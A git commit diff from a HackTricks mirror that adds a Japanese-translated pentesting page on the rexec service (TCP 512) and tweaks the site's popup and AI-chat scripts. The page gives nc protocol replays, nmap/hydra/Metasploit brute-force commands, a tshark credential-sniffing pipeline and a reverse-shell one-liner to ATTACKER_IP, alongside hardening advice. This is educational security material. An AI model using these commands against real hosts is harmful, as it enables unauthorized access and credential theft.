mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/network-services-pentesting/512-pentesting-rexec.md'] t
This commit is contained in:
Translator
parent
7eee0e0186
commit
caa6f731b5
@ -2,17 +2,103 @@
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## 基本情報
|
||||
|
||||
これは、**有効な** **資格情報**(ユーザー名とパスワード)を知っている場合に、**ホスト内でコマンドを実行することを許可するサービス**です。
|
||||
Rexec (remote **exec**) は、元々のバークレー *r*-サービススイートの一つです(`rlogin`、`rsh` などと共に)。これは **平文のユーザー名とパスワードのみで認証された** **リモートコマンド実行** 機能を提供します。このプロトコルは1980年代初頭に定義され(RFC 1060参照)、現在では **設計上不安全** と見なされています。それにもかかわらず、いくつかのレガシーUNIX / ネットワーク接続機器ではデフォルトで有効になっており、内部のペンテスト中に時折現れます。
|
||||
|
||||
**デフォルトポート:** 512
|
||||
**デフォルトポート:** TCP 512 (`exec`)
|
||||
```
|
||||
PORT STATE SERVICE
|
||||
512/tcp open exec
|
||||
```
|
||||
> 🔥 すべてのトラフィック – 認証情報を含む – は**暗号化されていない**状態で送信されます。ネットワークをスニッフィングする能力を持つ誰でも、ユーザー名、パスワード、コマンドを回復できます。
|
||||
|
||||
### プロトコルの概要
|
||||
|
||||
1. クライアントがTCP 512に接続します。
|
||||
2. クライアントは3つの**NUL終端**文字列を送信します:
|
||||
* 標準出力/標準エラーを受信したいポート番号(ASCII形式、通常は`0`)、
|
||||
* **ユーザー名**、
|
||||
* **パスワード**。
|
||||
3. 実行する**コマンド**を含む最終的なNUL終端文字列が送信されます。
|
||||
4. サーバーは、単一の8ビットステータスバイト(0 = 成功、`1` = 失敗)とコマンド出力を返します。
|
||||
|
||||
つまり、`echo -e`と`nc`だけで交換を再現できます:
|
||||
```bash
|
||||
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
|
||||
```
|
||||
有効な資格情報であれば、同じ接続で `id` の出力がそのまま返されます。
|
||||
|
||||
### クライアントを使用した手動操作
|
||||
|
||||
多くのLinuxディストリビューションは、依然として **inetutils-rexec** / **rsh-client** パッケージ内にレガシークライアントを含んでいます:
|
||||
```bash
|
||||
rexec -l user -p password <target> "uname -a"
|
||||
```
|
||||
`-p`を省略すると、クライアントはパスワードをインタラクティブに要求します(ワイヤ上で平文で表示されます!)。
|
||||
|
||||
---
|
||||
## 列挙とブルートフォース
|
||||
|
||||
### [**ブルートフォース**](../generic-hacking/brute-force.md#rexec)
|
||||
|
||||
### Nmap
|
||||
```bash
|
||||
nmap -p 512 --script rexec-info <target>
|
||||
# Discover service banner and test for stdout port mis-configuration
|
||||
|
||||
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
|
||||
```
|
||||
`rexec-brute` NSEは、上記で説明したプロトコルを使用して、非常に迅速に認証情報を試します。
|
||||
|
||||
### Hydra / Medusa / Ncrack
|
||||
```bash
|
||||
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
|
||||
```
|
||||
`hydra` は専用の **rexec** モジュールを持ち、最も高速なオフラインブルートフォースツールです。 `medusa` (`-M REXEC`) と `ncrack` (`rexec` モジュール) も同様に使用できます。
|
||||
|
||||
### Metasploit
|
||||
```
|
||||
use auxiliary/scanner/rservices/rexec_login
|
||||
set RHOSTS <target>
|
||||
set USER_FILE users.txt
|
||||
set PASS_FILE passwords.txt
|
||||
run
|
||||
```
|
||||
モジュールは成功するとシェルを生成し、資格情報をデータベースに保存します。
|
||||
|
||||
---
|
||||
## 資格情報のスニッフィング
|
||||
|
||||
すべてが平文であるため、**ネットワークキャプチャは非常に貴重です**。 トラフィックのコピーがあれば、ターゲットに触れることなく資格情報を抽出できます:
|
||||
```bash
|
||||
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
|
||||
awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command
|
||||
```
|
||||
(In Wiresharkで*Decode As …* TCP 512 → REXECを有効にして、きれいに解析されたフィールドを表示します。)
|
||||
|
||||
---
|
||||
## ポストエクスプロイトのヒント
|
||||
|
||||
* 提供されたユーザーの権限でコマンドが実行されます。`/etc/pam.d/rexec`が誤って設定されている場合(例:`pam_rootok`)、rootシェルが可能なことがあります。
|
||||
* Rexecはユーザーのシェルを無視し、コマンドを`/bin/sh -c <cmd>`を介して実行します。したがって、典型的なシェルエスケープトリック(`;`、``$( )``、バックティック)を使用して複数のコマンドを連結したり、リバースシェルを生成したりできます:
|
||||
```bash
|
||||
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
|
||||
```
|
||||
* パスワードは他のシステムの**~/.netrc**に保存されていることが多いです。1つのホストを侵害すると、それを再利用して横移動することができます。
|
||||
|
||||
---
|
||||
## ハードニング / 検出
|
||||
|
||||
* **rexecを公開しないでください**; SSHに置き換えてください。ほとんどの現代の*inetd*スーパサーバーは、デフォルトでサービスをコメントアウトします。
|
||||
* どうしても保持する必要がある場合は、TCPラッパー(`/etc/hosts.allow`)やファイアウォールルールでアクセスを制限し、アカウントごとに強力なパスワードを強制してください。
|
||||
* :512へのトラフィックと`rexecd`プロセスの起動を監視してください。単一のパケットキャプチャで侵害を検出するのに十分です。
|
||||
* `rexec`、`rlogin`、`rsh`を一緒に無効にしてください – それらはほとんど同じコードベースと脆弱性を共有しています。
|
||||
|
||||
---
|
||||
|
||||
## 参考文献
|
||||
|
||||
* Nmap NSE `rexec-brute`ドキュメント – [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
|
||||
* Rapid7 Metasploitモジュール`auxiliary/scanner/rservices/rexec_login` – [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
79
theme/ai.js
79
theme/ai.js
@ -1,11 +1,86 @@
|
||||
/**
|
||||
* HackTricks Training Discounts
|
||||
*/
|
||||
|
||||
|
||||
(() => {
|
||||
const KEY = 'htSummerDiscountDismissed';
|
||||
const IMG = '/images/discount.jpeg';
|
||||
const TXT = 'HT Summer Discount, Last Days!';
|
||||
|
||||
/* Stop if user already dismissed */
|
||||
if (localStorage.getItem(KEY) === 'true') return;
|
||||
|
||||
/* Quick helper */
|
||||
const $ = (tag, css = '') => Object.assign(document.createElement(tag), { style: css });
|
||||
|
||||
/* --- Overlay (blur + dim) --- */
|
||||
const overlay = $('div', `
|
||||
position: fixed; inset: 0;
|
||||
background: rgba(0,0,0,.4);
|
||||
backdrop-filter: blur(6px);
|
||||
display: flex; justify-content: center; align-items: center;
|
||||
z-index: 10000;
|
||||
`);
|
||||
|
||||
/* --- Modal --- */
|
||||
const modal = $('div', `
|
||||
max-width: 90vw; width: 480px;
|
||||
background: #fff; border-radius: 12px; overflow: hidden;
|
||||
box-shadow: 0 8px 24px rgba(0,0,0,.35);
|
||||
font-family: system-ui, sans-serif;
|
||||
display: flex; flex-direction: column; align-items: stretch;
|
||||
`);
|
||||
|
||||
/* --- Title bar (separate, over image) --- */
|
||||
const titleBar = $('div', `
|
||||
padding: 1rem; text-align: center;
|
||||
background: #222; color: #fff;
|
||||
font-size: 1.3rem; font-weight: 700;
|
||||
`);
|
||||
titleBar.textContent = TXT;
|
||||
|
||||
/* --- Image --- */
|
||||
const img = $('img');
|
||||
img.src = IMG; img.alt = TXT; img.style.width = '100%';
|
||||
|
||||
/* --- Checkbox row --- */
|
||||
const label = $('label', `
|
||||
display: flex; align-items: center; justify-content: center; gap: .6rem;
|
||||
padding: 1rem; font-size: 1rem; color: #222; cursor: pointer;
|
||||
`);
|
||||
const cb = $('input'); cb.type = 'checkbox'; cb.style.scale = '1.2';
|
||||
cb.onchange = () => {
|
||||
if (cb.checked) {
|
||||
localStorage.setItem(KEY, 'true');
|
||||
overlay.remove();
|
||||
}
|
||||
};
|
||||
label.append(cb, document.createTextNode("Don't show again"));
|
||||
|
||||
/* --- Assemble & inject --- */
|
||||
modal.append(titleBar, img, label);
|
||||
overlay.appendChild(modal);
|
||||
|
||||
(document.readyState === 'loading'
|
||||
? () => document.addEventListener('DOMContentLoaded', () => document.body.appendChild(overlay), { once: true })
|
||||
: () => document.body.appendChild(overlay))();
|
||||
})();
|
||||
|
||||
|
||||
|
||||
|
||||
/**
|
||||
* HackTricks AI Chat Widget v1.16 – resizable sidebar
|
||||
* ---------------------------------------------------
|
||||
* ❶ Markdown rendering + sanitised (same as before)
|
||||
* ❷ NEW: drag‑to‑resize panel, width persists via localStorage
|
||||
*/
|
||||
|
||||
|
||||
|
||||
(function () {
|
||||
const LOG = "[HackTricks‑AI]";
|
||||
const LOG = "[HackTricks-AI]";
|
||||
/* ---------------- User‑tunable constants ---------------- */
|
||||
const MAX_CONTEXT = 3000; // highlighted‑text char limit
|
||||
const MAX_QUESTION = 500; // question char limit
|
||||
@ -13,7 +88,7 @@
|
||||
const MAX_W = 600;
|
||||
const DEF_W = 350; // default width (if nothing saved)
|
||||
const TOOLTIP_TEXT =
|
||||
"💡 Highlight any text on the page,\nthen click to ask HackTricks AI about it";
|
||||
"💡 Highlight any text on the page,\nthen click to ask HackTricks AI about it";
|
||||
|
||||
const API_BASE = "https://www.hacktricks.ai/api/assistants/threads";
|
||||
const BRAND_RED = "#b31328";
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user